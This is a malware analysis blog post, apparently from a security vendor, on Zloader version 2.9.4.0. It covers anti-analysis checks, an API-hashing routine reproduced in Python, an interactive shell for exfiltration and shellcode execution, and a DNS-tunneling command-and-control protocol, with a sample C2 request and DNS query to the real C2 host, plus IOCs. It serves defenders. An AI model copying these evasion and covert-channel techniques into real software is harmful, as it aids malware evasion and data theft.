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Security Research

Inside Zloader’s Latest Trick: DNS Tunneling

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THREATLABZ
December 10, 2024 - 14 Min. de leitura

Introduction

Zloader (a.k.a. Terdot, DELoader, or Silent Night) is a modular Trojan based on the leaked Zeus source code that emerged in 2015. The malware was originally designed to facilitate banking fraud via Automated Clearing House (ACH) and wire transfers. However, similar to other malware families like Qakbot and Trickbot, Zloader has been repurposed for initial access, providing an entry point into corporate environments for the deployment of ransomware. Zloader reemerged one year ago following an almost two-year hiatus with a new iteration that included modifications to its obfuscation techniques, domain generation algorithm (DGA), anti-analysis techniques, and network communication.

ThreatLabz has identified a new version of Zloader (2.9.4.0) that has introduced features that further enhance the malware’s anti-analysis capabilities, an interactive shell for hands-on keyboard activity, and a Domain Name System (DNS) tunnel for command-and-control (C2) communications. These modifications provide additional layers of resilience against detection and mitigation. In this blog, we’ll explore each of these new Zloader features, and examine the mechanics of the new DNS tunneling protocol.

Key Takeaways

  • Zloader (a.k.a. Terdot, DELoader, or Silent Night) is a modular Trojan based on the leaked Zeus source code dating back to 2015.
  • Zloader 2.9.4.0 adds notable improvements including a custom DNS tunnel protocol for C2 communications and an interactive shell that supports more than a dozen commands, which may be valuable for ransomware attacks.
  • Zloader’s anti-analysis techniques such as environment checks and API import resolution algorithms continue to be updated to evade malware sandboxes and static signatures.
  • Zloader attacks have been performed using more targeted methods that include luring victims into initiating Remote Monitoring and Management (RMM) sessions.

Infection Vector

The distribution of Zloader has become more small-scale and targeted, which has become an increasingly popular trend among initial access brokers including those that are affiliates of Black Basta ransomware. This trend has led to a shift away from large-scale spam campaigns to more personalized voice-based attacks over the past year. ThreatLabz has observed Zloader deployed through a multi-stage infection chain starting through Remote Monitoring and Management (RMM) tools including AnyDesk, TeamViewer, and Microsoft Quick Assist. Furthermore, we have identified an additional malicious payload in the attack chain, which is known as GhostSocks. We assess with medium to high confidence that this payload was used to deploy Zloader as shown in the figure below:

Example Zloader attack chain observed by ThreatLabz.

Figure 1: Example Zloader attack chain observed by ThreatLabz.

Technical Analysis

In this section, we will analyze the changes introduced in Zloader 2.9.4.0. 

Configuration

The Zloader static configuration is no longer encrypted with a hardcoded plain-text RC4 key. Instead, the RC4 key is computed by performing an XOR operation with two 16-byte character arrays. After decrypting Zloader’s configuration, there are two new sections (highlighted below in red and blue) as shown below:

Zloader's decrypted configuration

Figure 2: Zloader decrypted static configuration.

These two sections are related to Zloader’s new DNS tunneling feature, which can encapsulate encrypted network traffic through a custom protocol using DNS A and AAAA records. The first new section in Zloader’s configuration contains an HTTPS URL used as the TLS Server Name Indication (SNI) during the TLS handshake. In this example, the value is fordns. This value is then followed by Zloader’s DNS nameserver (e.g., ns1.brownswer.com), which serves as the C2 for communication. The second new section in the Zloader configuration has three IP addresses (in network byte order) for the DNS servers to use for the C2 nameserver’s resolution in order of preference.

  • 2D 3D 98 9A →  45.61.152.154
  • 08 08 04 04 → 8.8.4.4
  • 08 08 08 08 → 8.8.8.8

Anti-analysis


Environment check

ThreatLabz identified Zloader version 2.9.4.0 samples labeled with the botnet name Test. These samples are noteworthy because they do not perform the anti-analysis registry-based environment check that we previously documented. This environment check normally prevents Zloader from running on any  system other than the one that it originally infected. 

However, in non-test Zloader 2.9.4.0 builds, a modified environment check is still present. Instead of checking the value of a pseudo-randomly generated registry key, Zloader utilizes an alternative method. The figure below illustrates the process that Zloader uses to perform this anti-analysis environment check.

Flow chart of Zloader’s environment check.

Figure 3: Flow chart of Zloader’s environment check.

Similar to previous versions of Zloader, the malware first checks whether its own executable name matches a hardcoded value that varies per sample. Zloader then computes an MD5 hash of the machine-specific bot ID.

The bot ID is composed of the following values:

  • Computer name
  • User name
  • Install date in seconds since the epoch (1970-01-01 UTC)

An example of a bot ID is: COMPANY1_JohnDoe_5BFEA21D

Zloader then retrieves a value within the executable’s .rdata section, which will be NULL if the Zloader executable has not been used to infect a system. If the Zloader executable has been used to infect a system, this value will be filled in by Zloader as part of the infection process. If the MD5 hash of the bot ID matches the expected value after installation, Zloader will continue execution. However, if this field is not NULL and does not match the expected hash value of the bot ID, Zloader will terminate. This environment check serves as an indication to the malware that the Zloader executable has been transferred to another environment (e.g., a malware sandbox or an analyst system).

During the installation phase, Zloader version 2.9.4.0 creates a copy of the original executable with a modified MZ header at offset 0x24, which is reserved for the OEM identifier and OEM information. The value at this offset serves as a pointer to the .rdata location where the MD5 hash value address is located. An example of the modified Zloader MZ header field at offset 0x24 is shown in the figure below:

Example Zloader MZ header modification prior to initializing the expected bot ID parameter in the .rdata section.

Figure 4: Example Zloader MZ header modification prior to initializing the expected bot ID hash parameter in the .rdata section.

Once the address in the .rdata section has been located, Zloader writes the expected MD5 hash of the bot ID to this region and zeros the modified bytes in the MZ header at offset 0x24. Zloader then launches this modified executable with the initialized bot ID field, and deletes the original executable.

API resolution

The import API resolution for Zloader was also updated in the latest version. The API resolution continues to use the cyclic redundancy check (CRC) algorithm, but the result is now calculated by performing an XOR operation with a constant, and function names are now converted to lowercase instead of uppercase letters. The following Python code replicates Zloader’s API resolution:

def calculate_checksum(func_name, xor_constant):
   checksum = xor_constant
   for element in func_name.lower():
       checksum = 16 * checksum - (0 - (ord(element)+1))
       if checksum & 0xf0000000 != 0:
           checksum = ((((checksum & 0xf0000000) >> 24) ^ checksum) & 0xfffffff)
   return checksum ^ xor_constant

Zloader also now dynamically calculates the index of the DLL name to resolve functions from in each case. Before, the code only had a single DWORD value with the checksum to resolve, and the index of the DLL was hardcoded. Now, Zloader uses two DWORDs per function to determine the DLL and function name. The figure below shows an example of several API functions and the corresponding DWORD values used for the resolution.

 Example Zloader values used to resolve API import names.

Figure 5: Example Zloader values used to resolve API import names.

An XOR operation with a constant value (that changes per sample) is performed with the second DWORD. Another XOR operation is performed with the result and the first DWORD. The code that replicates this algorithm is shown below:

dll_hash_index = dword_2 ^ 0xC3C0D88F; // the XOR constant varies per sample
hash_xor_crc = dll_hash_index ^ dword_1;


Interactive shell

Another new feature introduced in Zloader 2.9.4.0 was an interactive shell that provides the threat actor with the ability to execute arbitrary binaries and shellcode, exfiltrate data, terminate processes, etc. The table below shows the commands that are currently implemented in Zloader. 

Command

Description

exec

Execute binary.

cmd

Native command line.

getfile

Get file from server rshell/files.

sendfile

Send file to the server rshell/uploads.

getsc

Get shellcode from server rshell/files.

runsc

Run shellcode with the specified architecture.

 

getdll

Get DLL from the server rshell/files.

rundll

Run DLL from memory.

find_process

Find process by name.

status_process

Get process status by PID.

kill

Kill process.

cd

Display/change current directory.

dir

Show contents of a directory.

bot_id

Show bot ID.

exit

Quit shell.

Table 1: Zloader 2.9.4.0 interactive shell commands.

These commands are likely used by threat actors when performing hands-on keyboard activity related to reconnaissance and ransomware deployment.

Network communication


HTTPS

Zloader continues to use HTTPS with POST requests as the primary C2 communication channel. However, the Zloader HTTP headers have changed. For example, the User-Agent field is now set to PresidentPutin. In addition, Zloader adds a Rand HTTP header value set to pseudo random alphabetic characters between 32 and 255 characters in length. Since the request is sent via TLS, the Rand field varies the packet size to prevent potential size-based network detections. An example Zloader C2 HTTP POST request is shown below:

POST / HTTP/1.1
Host: bigdealcenter.world
User-Agent: PresidentPutin
Rand: ififywiqobnuebnodoexitnaeppupeohruloxycaevsariuvupdefesyruyhefiguddyybebipcusobywezalykosyazubykaskyduniilsifeucxybocafoacyblywiwiduangyolyptaziosrelituurmeyvvuuwfuimvuakd
Connection: close
Content-Length: 300

Zloader uses the Security Support Provider Interface (SSPI) for TLS, rather than using the WinINet API.

The body of the HTTP POST request continues to use the same bin storage data structure from Zeus as shown below:

struct zeus_binstorage {
 unsigned char[20] random_bytes;
 size_t total_size;
 unsigned int num_items;
 unsigned char[16] md5_hash;
 size_t item_type_1;
 unsigned int compressed_size_1;
 unsigned int uncompressed_size_1;
 unsigned char[compressed_size_1] item_data_1;
 ...
 size_t item_type_n;
 unsigned int compressed_size_n;
 unsigned int uncompressed_size_n;
 unsigned char[compressed_size_n] item_data_n;
}

The bin storage data structure is then encrypted with the Zeus VisualEncrypt algorithm, then encrypted again with a randomly generated 32-byte RC4 key. The RC4 key itself is then encrypted with a hardcoded 1,024-bit RSA public key. Thus, the first 128 bytes of the payload are the RSA encrypted RC4 key, followed by the RC4 + VisualEncrypt encrypted bin storage content.

DNS tunneling

The most significant update to Zloader’s C2 communication is the addition of DNS tunneling. Zloader implements a custom protocol on top of DNS using IPv4 to tunnel encrypted TLS network traffic (using the Windows SSPI API). Zloader constructs and parses DNS packets without relying on a third party library or the Windows API.

Zloader DNS requests use the following format: 

[prefix].[header].[payload].[zloader_nameserver_domain]

The header consists of 14 bytes that are converted into 28 lowercase hexadecimal values.

The 14-byte header consists of the following structure:

struct zloader_dns_tunnel_header{
 unsigned int session_id;        // randomly generated
 unsigned int sequence_num;      // incremented per packet
 byte msg_type;                  // 1-9
 byte field_1;
 unsigned int field_2;
}

The meaning of the last two fields varies depending on the message type, and is unused for some message types. For message type 0x4, the field_2 value denotes the number of parts that the message is broken into (typically 3) separated by periods. Each part can contain up to 62 characters (31 bytes) to remain compliant with the DNS protocol limit of 63 characters. Each packet can contain up to three parts per packet. Therefore, larger messages must be fragmented and sent in multiple packets. An example of a message type 0x4 (TLS client hello) Zloader DNS packet is shown below:

cdn.90baf13f03000000040003000000.160303009d0100009903036713bfbe1a8dea1ce0b97a5196762fe327f8da77.0a06e9aff09fff3a4f07cc1400002ac02cc02bc030c02f009f009ec024c023.c028c027c00ac009c014c013009d009c003d003c00.ns1.brownswer.com

This first component cdn is a hardcoded prefix value. The second component 90baf13f03000000040003000000 is the header that can be converted from a hexadecimal string to binary values as shown below: 

  • Session ID: 0x3ff1ba90
  • Sequence number: 0x3
  • Message type: 0x4
  • Field 1: 0x0
  • Field 2: 0x3 (number of parts in the request)

The third component of the request is the payload: 160303009d0100009903036713bfbe1a8dea1ce0b97a5196762fe327f8da77.0a06e9aff09fff3a4f07cc1400002ac02cc02bc030c02f009f009ec024c023.c028c027c00ac009c014c013009d009c003d003c00, which in this example can be parsed as a TLS client hello message (after converting from hexadecimal and removing the periods), as shown below: 

Content Type: 16 (0x16) indicates a Handshake message.

Version: 0303 (0x0303) indicates Handshake version TLS 1.2.

Length: 009d (0x009d) indicates the length of the Handshake message (157 bytes).

  • Handshake Type01 (0x01) indicates a ClientHello message.
  • Length000099 (0x000099) indicates the length of the ClientHello message (153 bytes).
  • Version0303 (0x0303) indicates ClientHello version TLS 1.2.
  • Random6713bfbe1a8dea1ce0b97a5196762fe327f8da770a06e9aff09fff3a4f07cc14 (32 bytes) is the client's random value.
  • Session ID Length00 (0x00) indicates that there is no session ID.
  • Cipher Suites Length002a (0x002a) indicates the length of the cipher suites (42 bytes).
  • Cipher Suites:
    • c02c (TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384)
    • c02b (TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256)
    • c030 (TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384)
    • c02f (TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256)
    • 009f (TLS_DHE_RSA_WITH_AES_256_GCM_SHA384)
    • 009e (TLS_DHE_RSA_WITH_AES_128_GCM_SHA256)
    • c024 (TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384)
    • c023 (TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256)
    • c028 (TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384)
    • c027 (TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256)
    • c00a (TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA)
    • c009 (TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA)
    • c014 (TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA)
    • c013 (TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA)
    • 009d (TLS_RSA_WITH_AES_256_GCM_SHA384)
    • 009c (TLS_RSA_WITH_AES_128_GCM_SHA256)
    • 003d (TLS_RSA_WITH_AES_256_CBC_SHA256)
    • 003c (TLS_RSA_WITH_AES_128_CBC_SHA256)

The last component ns1.brownswer.com is the Zloader C2 domain nameserver.

For message type 0x7, the field_2 value specifies the number of bytes that have been received (and acknowledged) from the DNS server. The following table shows the current Zloader DNS message types.

Message Type

Description

Record Type

0x1

Ping.

A

0x2

Session start.

A

0x3

Session initialization.

A

0x4

TLS client hello / client application data transfer.

A

0x5

Client data transfer complete.

A

0x6

Prepare server response.

A

0x7

TLS server hello request / server application data.

AAAA

0x8

Sent when the sequence number is a multiple of 100 (and greater than 0).

A

0x9

Unknown.

A

Table 2: Zloader 2.9.4.0 DNS tunnel message types.

The Zloader DNS server responds with A records that contain IPv4 addresses which serve different purposes. For example, the IPv4 address 8.8.8.8 is used as an acknowledgement message. For message type 0x7 packets that may involve transferring large amounts of data, the Zloader DNS server responds with IPv6 AAAA records.

Botnet and campaign IDs

ThreatLabz has identified the following Zloader version 2.9.4.0 botnet IDs and campaigns:

Botnet ID

Campaign ID

File Names

Test

1.0

HexaPort.exe, SyncSuite.exe, OmniScript.dll, PixelSignal.dll

Penta1

1.1

HexaLab.dll, HexaPort.dll

Penta2

1.1

HexaPort.dll, XenoGraph.dll, GridCloud.dll

BB3

1.1

PhoenixHub.dll, XenoLogic.dll

Table 3: Zloader 2.9.4.0 botnet IDs, campaign IDs, and file names.

The botnet ID BB3 is notable because it follows the same format used by Qakbot and Pikabot when those threat groups served as initial access brokers for Black Basta ransomware. Open source reporting, including CISA and Rapid7, has also tied Zloader with Black Basta distribution. Thus, ThreatLabz assesses with moderate to high confidence that this specific Zloader botnet ID is related to Black Basta ransomware attacks.

Conclusion

Zloader’s distribution methods and a new DNS tunneling communication channel suggest the group is focusing increasingly on evading detection. The threat group continues to add new features and functionality to more effectively serve as an initial access broker for ransomware. With the latest Zloader updates, organizations must ensure that they are inspecting not only web-based traffic, but also DNS-based network traffic. Zscaler ThreatLabz will continue to track this threat and add detections to protect our customers.

Zscaler Coverage

Zscaler’s multilayered cloud security platform detects indicators related to Zloader at various levels.

Zscaler Cloud Sandbox report

Figure 6: Zscaler Cloud Sandbox report

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Zloader at various levels with the following threat names:

Indicators Of Compromise (IOCs)

Indicator

Description

22c5858ff8c7815c34b4386c3b4c83f2b8bb23502d153f5d8fb9f55bd784e764

Zloader sample SHA256

603bd9ee50f7dc6de37f314bda227561f0fd67cdebf53a672ea32cce73a2efd3

Zloader sample SHA256

d212042504f851253347754c3d3624628e7ebf7c0bbd8160220bf6edcff24f16

Zloader sample SHA256

ec8414631644269ab230c222055beb36546ff3ee39cebbbfa7e794e2e609c8d9

Zloader sample SHA256

17a9900aff30928d54ce77bdcd0cdde441dd0215f8187bac0a270c5f8e4db9cc

Zloader sample SHA256

2794a703aff5549a89834d0ef8ad4b97ce12e27fa37852dd2a504e5a0078b093

Zloader sample SHA256

3610f213db22a9de07dbbed4fbf6cec78b6dd4d58982c91f3a4ef994b53a8adc

Zloader sample SHA256

cbff717783ee597448c56a408a066aaae0279dd8606e6d99e52a04f0a7a55e03

Zloader sample SHA256

a9f2c4bc268765fc6d72d8e00363d2440cf1dcbd1ef7ee08978959fc118922c9

Zloader sample SHA256

db34e255aa4d9f4e54461571469b9dd53e49feed3d238b6cfb49082de0afb1e4

Zloader sample SHA256

49405370a33abbf131c5d550cebe00780cc3fd3cbe888220686582ae88f16af7

Zloader sample SHA256

f1a9ef13784ba05628c12decbbe44e7708793d1a707f9fbc2475c42e1ec2cb7d

Zloader sample SHA256

40b4bb1919e9079d1172c5dee5ac7d96c5e80ede412b8e3ef382230a908733cc

Zloader sample SHA256

bigdealcenter.world

Zloader HTTPS C2 server

unitedcommunity.world

Zloader HTTPS C2 server

ns1.brownswer.com

Zloader DNS C2 server

45.61.152.154Zloader DNS C2 nameserver resolver
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